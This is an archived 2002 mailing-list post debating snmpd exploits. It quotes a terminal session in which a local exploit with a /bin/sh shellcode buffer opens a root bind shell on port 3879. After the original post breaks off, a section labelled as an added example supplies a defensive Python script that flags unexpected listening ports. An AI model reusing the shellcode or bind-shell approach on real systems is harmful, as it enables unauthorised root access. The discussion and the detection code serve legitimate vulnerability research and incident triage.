Vulnerability Development mailing list archives
Re: snmpd exploit examination - snmpwalk
From: KF <dotslash () snosoft com>
Date: Thu, 21 Feb 2002 13:57:30 -0500
Don't get me wrong... I didn't say it couldn't be done... I have seen the results of a successful exploitation as well... I was in particular speaking about the questionable exploits that had been released to the lists... which happened to be dependent on snmpwalk. There were already claims of them being bunk made by someone else; I was just sharing my 2 cents on that particular subject.
-KF

xbud wrote:

that's great.. but how would you explain a root shell sitting on a port i defined on an exploit i didn't release?

note! I still haven't tested the "Zen-Parse" one.

[root@dejaking /root]# snmpd
[root@dejaking /root]# whereis snmpd
snmpd: /usr/sbin/snmpd /usr/man/man1/snmpd.1.gz
[root@dejaking /root]# ps -ef | grep snmpd
root     15027     1  6 18:05 pts/2    00:00:00 snmpd
root     15030 14973  0 18:05 pts/2    00:00:00 grep snmpd
[root@dejaking /root]# gdb /usr/sbin/snmpd
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
(gdb) at 15027
Attaching to program: /usr/sbin/snmpd, Pid 15027
Reading symbols from /usr/lib/libucdagent.so.0...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libucdmibs.so.0...(no debugging symbols found)...done.
<snip>
0x4020c17e in __select () from /lib/libc.so.6
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) c
Continuing.

: command not found
[xbud@dejaking xbud]$ ./ecksploit -20
sizeof(buffer) = 256
ret = 0xbfffd61c
buffer = Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿?????????????????????????0/00å1Ò²f0/00Ð1É0/00ËC0/00]øC0/00]ôK0/00Mü?MôÍEUR1É0/00EôCf0/00]ìfÇEî'0/00Mð?Eì0/00 EøÆEü0/00Ð?MôÍEUR0/00ÐCCÍEUR0/00ÐCÍEUR0/00Ã1ɲ?0/00ÐÍEUR0/00ÐAÍEURë?^0/001À^F0/00E ° 0/00ó??U ÍEURèãÿÿÿ/bin/shÿ¿
Timeout: No Response from 127.0.0.1
[xbud@dejaking xbud]$ netstat -an --tcp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:3879            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6011            0.0.0.0:*               LISTEN
tcp        0      0 xx.xx.xx.xx:22          24.28.xx.xx:64408       ESTABLISHED
tcp        0      0 0.0.0.0:6010            0.0.0.0:*               LISTEN
tcp        0      0 xx.xx.xx.xx:22          24.28.xx.xx:64407       ESTABLISHED
[xbud@dejaking xbud]$ telnet localhost 3879
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
pwd;
/root

cheers,
xbud

tested on both 4.1.1 and 4.0.1 source and default installs.

cheers

On Wednesday 20 February 2002 03:14 pm, you wrote:
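The thing that gives the compromise away in xbud's transcript is the netstat listing: a LISTEN socket on a port (3879) that no service on the box should own. The following script is an added example, not part of the original thread or of any snmpd tooling; it parses the `netstat -an --tcp` output format quoted above and reports listeners that are not on a per-host allowlist, which is the triage check an administrator would run after a suspected snmpd compromise. The sample netstat text, the allowlist contents and the 10.0.0.x addresses are constructed for the example (the original post masked its addresses as xx.xx).

```python
"""Flag unexpected listening TCP sockets in `netstat -an --tcp` output.

Added example for the thread above, not code from the original post.
It parses the netstat output format shown there and reports LISTEN
sockets whose port is not on an allowlist, which is how an unexpected
bind shell (port 3879 in the post) stands out during triage.
"""
import re
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample modelled on the netstat listing quoted in the thread.
# Addresses are made up; the original masked them as xx.xx.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:3879            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6011            0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:64408          ESTABLISHED
tcp        0      0 0.0.0.0:6010            0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:22             10.0.0.9:64407          ESTABLISHED
"""

# Assumed baseline for this host: sshd plus the two X11-forwarding sockets
# (6010/6011) that an ssh -X session opens. Adjust per host.
ALLOWED_LISTEN_PORTS: Set[int] = {22, 6010, 6011}

# One netstat row: proto, Recv-Q, Send-Q, local, foreign, optional state
# (UDP rows have no state column, so it is optional).
LINE_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+"
    r"(?P<local>\S+)\s+(?P<remote>\S+)\s*(?P<state>\S+)?\s*$"
)


def split_endpoint(endpoint: str) -> Tuple[str, Optional[int]]:
    """Split 'addr:port' into (addr, port); port '*' means unbound -> None."""
    addr, _, port = endpoint.rpartition(":")
    return addr, (None if port == "*" else int(port))


def parse_netstat(text: str) -> List[Dict]:
    """Parse netstat -an --tcp output into row dicts; banner lines are skipped."""
    rows: List[Dict] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # banner / header line, not a socket row
        laddr, lport = split_endpoint(m.group("local"))
        raddr, rport = split_endpoint(m.group("remote"))
        rows.append({
            "proto": m.group("proto"),
            "local_addr": laddr, "local_port": lport,
            "remote_addr": raddr, "remote_port": rport,
            "state": m.group("state") or "",
        })
    return rows


def unexpected_listeners(text: str,
                         allowed: Set[int] = ALLOWED_LISTEN_PORTS) -> List[int]:
    """Return the sorted LISTEN ports that are not on the allowlist."""
    ports = {
        r["local_port"] for r in parse_netstat(text)
        if r["state"] == "LISTEN" and r["local_port"] not in allowed
    }
    return sorted(ports)


if __name__ == "__main__":
    for port in unexpected_listeners(SAMPLE_NETSTAT):
        print(f"unexpected listener on tcp/{port}")  # prints tcp/3879
```

Run it against live output with `netstat -an --tcp | python3 listeners.py` after changing the `__main__` block to read `sys.stdin`; the point of the allowlist is that it is built from the host's known services beforehand, so a new listener is a finding rather than noise. Pairing the flagged port with `fuser` or `lsof -i` then tells you which process (here, the exploited snmpd) owns it.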
Current thread:
- snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk Syzop (Feb 21)
- Message not available
- Re: snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk xbud (Feb 21)
- <Possible follow-ups>
- Re: snmpd exploit examination - snmpwalk The Itch (Feb 21)